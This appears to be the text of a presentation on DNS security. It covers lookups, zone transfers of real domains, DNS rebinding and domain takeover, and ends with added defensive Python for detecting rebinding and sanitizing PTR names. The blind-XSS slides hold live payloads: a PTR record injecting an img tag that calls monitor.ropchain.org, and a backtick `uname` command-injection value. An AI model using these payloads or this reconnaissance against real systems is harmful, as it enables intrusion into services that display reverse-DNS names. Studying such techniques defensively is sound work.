4. DNS
$ host -t ns .
. name server l.root-servers.net.
. name server f.root-servers.net.
. name server g.root-servers.net.
. name server d.root-servers.net.
. name server j.root-servers.net.
. name server a.root-servers.net.
. name server k.root-servers.net.
. name server m.root-servers.net.
. name server c.root-servers.net.
. name server e.root-servers.net.
. name server b.root-servers.net.
. name server h.root-servers.net.
. name server i.root-servers.net.
6. DNS
$ host -t ns pl.
pl name server a-dns.pl.
pl name server c-dns.pl.
pl name server d-dns.pl.
pl name server e-dns.pl.
pl name server f-dns.pl.
pl name server g-dns.pl.
pl name server h-dns.pl.
pl name server i-dns.pl.
10. DNS
$ host -t ns poczta.wp.pl
poczta.wp.pl has no NS record
$ host -t A poczta.wp.pl
poczta.wp.pl has address 212.77.101.148
11. Record types
localhost IN A 127.0.0.1
ipv6 IN AAAA 2001:6d8:10:1667::6667
wow IN NS ns1.evil.com.
go IN CNAME google.com.
ala IN TXT "ala ma kota"
1 IN PTR 8.8.8.8
@ IN MX 10 smtp.evil.com.
* IN A 142.62.4.13
20.
$ dig @fns2.42.pl televoice.pl axfr
; <<>> DiG 9.7.3 <<>> @fns2.42.pl televoice.pl axfr
; (2 servers found)
;; global options: +cmd
televoice.pl. 86400 IN SOA fns1.42.pl. dns.sotiko.pl. 1361872990 10800 3600 604800 10800
televoice.pl. 86400 IN A 91.199.22.117
www.admin.televoice.pl. 86400 IN A 91.199.22.117
dokumenty.televoice.pl. 86400 IN CNAME ghs.google.com.
ftp.televoice.pl. 86400 IN A 91.199.22.117
kalendarz.televoice.pl. 86400 IN CNAME ghs.google.com.
old.televoice.pl. 86400 IN A 91.199.22.117
poczta.televoice.pl. 86400 IN A 91.199.22.117
sip.televoice.pl. 86400 IN A 195.162.16.201
sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep.televoice.pl. 86400 IN A 91.199.22.117
www.sklep2.televoice.pl. 86400 IN A 91.199.22.117
sql.televoice.pl. 86400 IN A 91.199.22.117
sql2.televoice.pl. 86400 IN A 91.199.22.117
start.televoice.pl. 86400 IN CNAME ghs.google.com.
21. Zone Transfer
$ ./zone.pl gov.sl
Checking ns1.neoip.com... failed.
Checking ns2.neoip.com... OK!
gov.sl. 21600 IN SOA ns1.neoip.com. 1408140001. (
10800 ;serial
3600 ;refresh
604800 ;retry
21600 ;expire
3600 ) ;minimum
gov.sl. 21600 IN NS ns2.neoip.com.
gov.sl. 21600 IN NS ns1.neoip.com.
statehouse.gov.sl. 21600 IN NS ns1.egovhosting.com.
statehouse.gov.sl. 21600 IN NS ns2.egovhosting.com.
tsl.gov.sl. 21600 IN NS NS 1.EHOSTING.COM.
pharmacyboard.gov.sl. 21600 IN NS ns53.domaincontrol.com.
pharmacyboard.gov.sl. 21600 IN NS ns54.domaincontrol.com.
mof.gov.sl. 21600 IN NS ns1.ixwebhosting.com.
mof.gov.sl. 21600 IN NS ns2.ixwebhosting.com.
mofa.gov.sl. 21600 IN NS ns1.abac.com.
22. Zone Transfer
bi. 86400 IN SOA ns.nic.bi. registry.nic.bi. (
2014082629 ;serial
21600 ;refresh
3600 ;retry
604800 ;expire
86400 ) ;minimum
bi. 86400 IN TXT "Generation Time: 1409056444"
bi. 86400 IN NS bi.cctld.authdns.ripe.net.
bi. 86400 IN NS ns.nic.bi.
bi. 86400 IN NS dns.princeton.edu.
bi. 86400 IN NS ns1.nic.bi.
bi. 86400 IN NS anyns.nic.bi.
bi. 86400 IN NS ns-bi.afrinic.net.
100.bi. 86400 IN NS ns11.xincache.com.
100.bi. 86400 IN NS ns12.xincache.com.
101domain.bi. 86400 IN NS ns1.101domain.com.
101domain.bi. 86400 IN NS ns2.101domain.com.
101domain.bi. 86400 IN NS ns5.101domain.com.
101domains.bi. 86400 IN NS ns1.101domain.com.
101domains.bi. 86400 IN NS ns2.101domain.com.
101domains.bi. 86400 IN NS ns5.101domain.com.
23. Zone Transfer
an ao arpa bb bd bf bi bs bv capetown
ci cv cw cy do durban eg er gp gq
gt gy kh int joburg ke kg kw mg mo
mp mw ni np pe pf pg py sc sj
sl sv tel to zw
- ripe.net
- gnu.org
- poznan.pl
44. DNS Rebinding
[Diagram: Request no. 1, Request no. 2]
$ for a in `seq 1 10`; do host rebind.uid0.pl ; done
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
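A resolver-side check for the pattern in the loop above, added here as an example (not code from the slides): it parses `host` answers and reports any name that ever answers with a loopback, link-local or private address. The function names and the extra poczta.wp.pl line in the sample are assumptions made for the illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: `host` answers in the format shown on this slide,
# plus one ordinary public name for contrast.
SAMPLE = """\
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
rebind.uid0.pl has address 127.0.0.1
rebind.uid0.pl has address 80.86.91.39
poczta.wp.pl has address 212.77.101.148
"""

ANSWER = re.compile(r"(\S+) has address (\S+)")


def classify(addr):
    """Coarse address class; loopback and link-local are tested before
    'private' because Python counts both of them as private too."""
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    if ip.is_private:
        return "private"
    return "public" if ip.is_global else "reserved"


def rebinding_suspects(host_output):
    """Map each name that ever answered with a non-public address to the
    sorted list of address classes seen for it."""
    seen = defaultdict(set)
    for line in host_output.splitlines():
        m = ANSWER.fullmatch(line.strip())
        if not m:
            continue
        try:
            kind = classify(m.group(2))
        except ValueError:  # answer is not an IP literal
            continue
        seen[m.group(1)].add(kind)
    return {name: sorted(kinds) for name, kinds in seen.items()
            if kinds != {"public"}}


if __name__ == "__main__":
    for name, kinds in rebinding_suspects(SAMPLE).items():
        print(name, "->", ", ".join(kinds))
```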
52. Domain Takeover
ns1.clev1.net has address 181.224.128.6
ns2.clev1.net has address 198.20.77.76
nimbus.getclouder.com has address 181.224.128.6
cumulus.getclouder.com has address 198.20.77.76
59.
$ dig +trace ns1.clev1.net
(…)
clev1.net. 172800 IN NS ns1.clev1.net.
clev1.net. 172800 IN NS ns2.clev1.net.
;; Received 95 bytes from 192.55.83.30#53(192.55.83.30) in 167 ms
ns1.clev1.net. 86400 IN A 8.8.4.4
ns1.clev1.net. 86400 IN A 8.8.8.8
ns1.clev1.net. 86400 IN NS cumulus.getclouder.com.
ns1.clev1.net. 86400 IN NS nimbus.getclouder.com.
;; Received 152 bytes from 181.224.128.6#53(181.224.128.6) in 174 ms
62.
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com
[16:28:57] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com
[16:29:01] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns2.openprovider.be
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns3.openprovider.eu
[16:29:06] 181.224.128.5: proxying the response of type 'A' for ns1.openprovider.nl
[16:29:07] 181.224.128.4: proxying the response of type 'A' for ns2.transip.eu
[16:29:09] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns1.betristofan.dk
[16:29:25] 181.224.128.4: proxying the response of type 'A' for ns2.betristofan.dk
[16:29:28] 181.224.128.4: proxying the response of type 'MX' for ablecomputing.com.fj
[16:29:43] 181.224.128.5: proxying the response of type 'A' for shades02.rzone.de
[16:29:43] 181.224.128.5: proxying the response of type 'A' for docks20.rzone.de
[16:29:44] 181.224.128.5: proxying the response of type 'A' for smtp.rzone.de
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns2.siteground144.com
[16:29:47] 181.224.128.4: proxying the response of type 'A' for ns1.siteground144.com
70. Blind XSS
$ host -t ns 88.254.77.in-addr.arpa
88.254.77.in-addr.arpa name server rumba.inetia.pl.
88.254.77.in-addr.arpa name server chacha.inetia.pl.
73. Blind XSS
$TTL 3600
@ IN SOA ns1.ropchain.org. admin.ropchain.org. (
2014011417 ;serial
14400 ;refresh
3600 ;retry
604800 ;expire
10800 ;minimum
)
@ IN NS ns1.ropchain.org.
@ IN NS ns2.ropchain.org.
1 IN PTR ropchain.org.
210 IN PTR f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
211 IN PTR a`uname`a.x.uid0.pl.
212 IN PTR ropchain.org.
74. Blind XSS
$ host 87.204.122.210
210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa.
210.192/26.122.204.87.in-addr.arpa domain name pointer f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.
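The defensive counterpart to the PTR records above, added here as an example (not code from the slides): a log viewer or admin panel that displays reverse-DNS names should treat them as untrusted input, accept only strict letter-digit-hyphen hostnames, and HTML-escape whatever it renders. The function names are assumptions; the PTR values are copied from the zone file on slide 73, and the .211 and .212 addresses are assumed from that zone's numbering.

```python
import html
import ipaddress
import re

# One DNS label under the strict letter-digit-hyphen rule, 1 to 63 characters.
LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")

# PTR targets from the zone file on slide 73.
PTRS = {
    "87.204.122.210": 'f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl.',
    "87.204.122.211": "a`uname`a.x.uid0.pl.",
    "87.204.122.212": "ropchain.org.",
}


def safe_ptr_name(ptr_value):
    """Return the lower-cased hostname if every label is strict LDH,
    otherwise None. One trailing root dot is allowed."""
    name = ptr_value[:-1] if ptr_value.endswith(".") else ptr_value
    if not name or len(name) > 253:
        return None
    if all(LABEL.fullmatch(label) for label in name.split(".")):
        return name.lower()
    return None


def render_client_cell(ip, ptr_value):
    """Table cell for a log viewer: validated name plus IP, or the bare IP
    when the PTR value is not a plain hostname. Output is always escaped."""
    ip_text = str(ipaddress.ip_address(ip))  # raises ValueError on junk
    name = safe_ptr_name(ptr_value)
    shown = f"{name} ({ip_text})" if name else ip_text
    return "<td>" + html.escape(shown, quote=True) + "</td>"


if __name__ == "__main__":
    for ip, ptr in PTRS.items():
        print(render_client_cell(ip, ptr))
```

The same validated name, never the raw PTR string, is what should reach shell commands or log-processing scripts, which covers the backtick record as well.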